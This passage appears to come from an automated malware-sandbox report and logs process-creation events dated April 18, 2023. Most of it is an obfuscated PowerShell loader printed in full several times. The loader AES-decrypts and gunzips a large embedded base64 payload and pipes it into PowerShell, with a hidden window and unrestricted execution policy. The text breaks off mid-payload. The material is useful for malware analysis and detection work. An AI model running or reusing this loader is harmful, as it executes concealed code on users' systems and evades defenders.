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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG
cmdline	"C:\Windows\system32\cmd.exe" /c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell -

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 18, 2023, 9:51 a.m.	thread_identifier: 2200 thread_handle: 0x00000368 process_identifier: 2196 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell - } filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000374	1	1
ShellExecuteExW April 18, 2023, 9:51 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $czJl = 'AAAAAAAAAAAAAAAAAAAAAI/qR6Qo+tei6M2ZAL5aETbauJv4e0Z5t3z1uC9ud0jKjvIYyApg827M8IEYlnMkcrVOj4liYnaMiTZzMn1qXT08YYK7IM8JB29pYJgIM5XlJ0S2yPsO7Hn4SIT738/EImNcjOHzN5qSYzkU3oJQKn5VoZLpsd0etc/qgLwIShRMrYah7eOtDD90TEo/sQUb/4qG1UyzfrPEnEhNiodPv2UZDGW0w2aMsGrF8EoHiyNBLV2tyqGdoY4NBEfbjB151RdoGvtaocKX9plmeoOtqSiQyDuVt5ulS93uMYYyqc51yq26WTECSSUNbdVtMq7IXadWiS1yQP1e/qDT/go/c5G1At1XYqCP1//ThFM4kVpWRg9eGq5k6Lp59tCYVBx96xSGlsgFN/A9cCwsEeNwRmH6iNR2Flab0lQrz3Uut4SX/r/4lkfm7TC2Rp4bNbE4obVZ43EDTjrZICq0gUTXl76tG+5jxyoFrp5bX3M04tir4LIy2GaqcBD2XGWN6Su1XWUc/cxYO5lrB+tf0iATixZsYb9NQu/G/RdKwoFp3gm8xXbaiOeQp8GukSwsH2BRtW7EGCGcwgvPqlwEEiH6nF6v1are+75y1bOxgoGdmVEHO02NQMQGqIBZbBggMtTQ1HZBKuD7cCW968cJV67QBefrwuHm9+Ys9OgX8vHHx8nFLJclw+zT6SKH2l4lQyhx66iBZ1d94g1xXwe1wRukzJN0CWiIg97FmIRNaVXwFqMA1dvi8mkmP2xD2+1ACx9asVnsx9lSJNIinkXnoBW1K5u9DaJ2aSA6oM5Fk/Zb2yCgqN2S7QNyjb7wdAxgJe/EsW7ULK7kl6fZMbRBrlZ4zcp1W6Dx0H4ENZJdHT05oR6zRwGo7DIYKLAsBhl0umLIlw+fMdtAxdcvnAGDE2cNv1qjRelOCwMKOtQNAi2PxiKQ6XuDFGvGkwNBbwqfTPsBSR+aKrBdqgoLIMYIDzoQXgFC6AlIGQBM2lerjWZe+vUH7jaXe068aJASoPAazELAnwtP4fC0mjFbrXlD4yGUwWnCV1NY6YhpDFwPK6I5u+R/4qZPz7Yn9TkFfqTykYc3oWknjge106xxCNtjur/Dytp1VbUDNdTDBS2piV0XpiDaqf+G6UlYy5/Vad2wahouzjsLuVgUpOxMYK2Oz+s2VuvCUs2urIThOXZAAiq9Z4VnA8HbmCifp08UmITK0MrIAGAu2VRoho17rCi2+yzDaTIQraJ0ZMoBbWseQEym6I3V6zuVjOvKOCfMbODXEbvuwnrEQdB1GRRdTVvYgBP7vOAjSdW97bKCNhYKWLzKIARtKT4oWcuYLMGHDvhABCmDUOOFvHoKus3j5RZExdjaVBCfjrFHrUkNq6+bl2eN7sxpsE72dg/eJGzYamnhpmN7jNvDdDS8u3dePXBTJoKrp/3Wkk7UbENzPzcGexdPbCxqEkmrt/pLvnJTFX0CVa7mizCOPLEv2V9W/y0e2q5YgpT7Ro8x5f5PV3cAm3liwCKvg8KwIUuzIMaSzNmC1H1hoRMRHf4TyVCRqIr9MoRQORb/GCZeR8QQFw1OUekRN80DUu6s5DDI1CvJhvryer0wXIM1K0WnIZOe2sBqOpjzjeGGo5HU9EjWjXq5/YQJWYVcNeMSz6f9JnUmZtXcV2frbBU7D2SlBDXeIuvibv51e4rkxrvM2rmMXLvsbY7Zb5KcGcpgnGavjVKkvs